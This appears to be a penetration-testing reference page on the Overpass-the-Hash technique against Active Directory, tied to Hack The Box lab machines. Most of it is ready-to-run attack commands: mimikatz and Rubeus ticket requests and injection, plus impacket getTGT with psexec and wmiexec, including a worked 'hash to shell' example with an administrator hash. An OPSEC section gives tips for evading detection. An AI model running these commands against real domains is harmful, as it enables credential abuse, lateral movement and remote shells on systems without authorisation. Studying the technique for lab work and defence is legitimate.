Overpass-the-Hash
#Overview
Overpass-the-Hash converts an NTLM hash into a valid Kerberos TGT (Ticket Granting Ticket) by requesting one directly from the Domain Controller using the NTLM hash as the pre-authentication material. Unlike standard Pass-the-Hash (which uses NTLM authentication directly), Overpass-the-Hash obtains Kerberos tickets, enabling access to Kerberos-only services and resources that require Kerberos authentication.
#Prerequisites
- NTLM hash of a domain user (any user with Kerberos pre-authentication)
- Access to the Kerberos service (port 88) on the Domain Controller
- Time synchronization with DC (within 5 minutes)
- mimikatz, Rubeus (Windows), or impacket-getTGT (Linux)
#When to Use Overpass-the-Hash vs PTH
| Scenario | Use |
|---|---|
| Target service requires Kerberos (IIS with Windows Auth) | Overpass-the-Hash |
| SMB/WinRM/RDP with NTLM auth | Pass-the-Hash (simpler) |
| Need to access resources across domain trusts via Kerberos | Overpass-the-Hash |
| Windows integrated authentication in web apps | Overpass-the-Hash |
#Exploitation / Execution
#1. Mimikatz (from elevated Windows shell)
mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<NTLM_hash> /run:cmd.exe
POWERSHELL
This spawns a new cmd.exe that first requests a Kerberos TGT using the provided NTLM hash, then uses Kerberos for any subsequent network authentication. The user's Kerberos tickets are visible via klist in the new window.
#2. Rubeus asktgt (from Windows)
.\Rubeus.exe asktgt /user:<user> /domain:<domain> /rc4:<NTLM_hash> /nowrap
# Example:
.\Rubeus.exe asktgt /user:administrator /domain:htb.local /rc4:d9485863c1e9e05851aa40cbb4ab9dff /nowrap
POWERSHELL
Then inject the resulting base64 ticket:
.\Rubeus.exe ptt /ticket:<base64_ticket>
POWERSHELL
#3. impacket-getTGT (from Linux)
# Request TGT using NTLM hash (rc4 key)
impacket-getTGT.py <domain>/<user> -hashes :<NTLM_hash>
# Or with AES256 key:
impacket-getTGT.py <domain>/<user> -aesKey <AES256_key>
export KRB5CCNAME=<user>.ccache
# Use with any Kerberos-aware tool
impacket-psexec.py <domain>/<user>@<IP> -k -no-pass
impacket-wmiexec.py <domain>/<user>@<IP> -k -no-pass
BASH
#4. Combined Workflow (Hash to Shell)
# Step 1: Get TGT from hash
impacket-getTGT.py htb.local/administrator -hashes :d9485863c1e9e05851aa40cbb4ab9dff
# Step 2: Export ticket
export KRB5CCNAME=administrator.ccache
# Step 3: Synch time
sudo ntpdate -u dc.htb.local
# Step 4: Execute
impacket-psexec.py htb.local/administrator@dc.htb.local -k -no-pass
BASH
#Post-Execution Verification
klist # List Kerberos tickets (should show TGT)
klist tgt # Show TGT specifically
whoami # Verify user context
dir \\DC\C$ # Test Kerberos auth to a network share
POWERSHELL
#Common Pitfalls
- ⚠️ Clock skew > 5 minutes -> Kerberos auth fails silently. Fix:
sudo ntpdate -u <DC_IP> - ⚠️ AES256 key preferred over RC4 (NTLM) on modern DCs -> Use
-aesKeywith impacket or Rubeus/aes256 - ⚠️ NTLM hash must be of a user with Kerberos pre-authentication -> disabled accounts won't work
#OPSEC Considerations
- 🛡️ TGT request generates Event ID 4768 (Kerberos Authentication Service) with Pre-Authentication Type 0 (not encrypted timestamp)
- 🛡️ TGT from RC4 hash may be flagged by ATA/Defender for Identity as downgraded encryption
- 🛡️ Prefer AES256 key over RC4 hash when available for lower detection probability
#Post-Exploitation Value
- Access to Kerberos-only services (web apps, cross-trust resources)
- TGT can be used to request service tickets for any service
- No password knowledge required -- hash is sufficient
- Enables ticket-based persistence strategies
#Cross-References
#Tool References
| Tool | Link |
|---|---|
| mimikatz | https://github.com/gentilkiwi/mimikatz |
| Rubeus | https://github.com/GhostPack/Rubeus |
| impacket | https://github.com/fortra/impacket |
#Source Machines
- Sauna (Easy, AD) - Overpass-the-Hash from DCSync Administrator hash
- Forest (Easy, AD) - Kerberos service access via hash-to-TGT